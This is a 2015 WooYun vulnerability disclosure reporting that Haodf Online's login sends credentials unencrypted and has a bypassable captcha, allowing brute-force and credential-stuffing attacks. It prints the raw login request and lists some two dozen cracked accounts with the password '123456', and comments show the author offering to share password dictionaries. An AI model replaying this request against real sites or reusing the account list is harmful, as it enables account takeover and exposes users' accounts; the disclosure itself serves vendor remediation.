当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117023

漏洞标题:好大夫在线登陆口配置不当导致可撞库攻击

相关厂商:好大夫在线

漏洞作者: 花心h

提交时间:2015-05-31 18:04

修复时间:2015-07-13 14:55

公开时间:2015-07-13 14:55

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-31: 细节已通知厂商并且等待厂商处理中
2015-05-31: 厂商已经确认,细节仅向厂商公开
2015-06-10: 细节向核心白帽子及相关领域专家公开
2015-06-20: 细节向普通白帽子公开
2015-06-30: 细节向实习白帽子公开
2015-07-13: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

该重视了。

详细说明:

本次漏洞测试如有不当之处,请多多包涵。
登陆口:https://passport.haodf.com/user/showlogin
问题一:传输未经任何加密,可抓包暴力破解。
问题二:验证码机制错误,可在第一次无验证码情况下抓包进行破解。
问题三:验证码验证错误,只在登陆框先Post一个验证码是否正确的请求后无后续认证。 导致验证码可绕过
发送包:
GET /user/ajaxusercnt4username?username=【非加密的用户名】&password=【非加密的密码】&_=1432897693736 HTTP/1.1
Host: passport.haodf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://passport.haodf.com/user/showlogin
Cookie: PHPSESSID=si7sb4p5t2jq6ui05hpc0rl9u0; g=29330_1432893752467; CNZZDATA1915189=cnzz_eid%3D1251987341-1432893432-%26ntime%3D1432893432
Connection: close

漏洞证明:

1.png


部分账号
ADMN 123456
CLARK 123456
DEFAULT 123456
EVENT 123456
HELLO 123456
HELP 123456
NEVIEW 123456
USER3 123456
abran 123456
adam 123456
adolph 123456
alika 123456
alix 123456
aloysius 123456
alvy 123456
amandi 123456
amity 123456
andrew 123456
andromache 123456
andy 123456
annabel 123456
ansel 123456
anthony 123456
anya 123456
archie 123456
ariana 123456


修复方案:

禁止弱口令。
修复验证码验证机制

版权声明:转载请注明来源 花心h@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-31 21:05

厂商回复:

非常感谢,我们会尽快处理

最新状态:

2015-07-07:已经修复了。

2015-07-13:弱密码已经禁止,感谢洞主。


漏洞评价:

评论

  1. 2015-07-24 17:30 | 指尖上的故事 ( 普通白帽子 | Rank:347 漏洞数:77 | ...........)

    楼主手上应该有各种字典 关注你很久 ....能分享一下字典吗

  2. 2015-07-24 21:58 | 花心h ( 实习白帽子 | Rank:88 漏洞数:28 | 此用户已封停)

    @指尖上的故事 可以啊,私信我QQ我加你

  3. 2015-09-06 09:29 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    @指尖上的故事 顺便也来一发可否

  4. 2015-09-06 13:15 | 花心h ( 实习白帽子 | Rank:88 漏洞数:28 | 此用户已封停)

    @计算姬 哇,大牛。来来来加我QQ我给你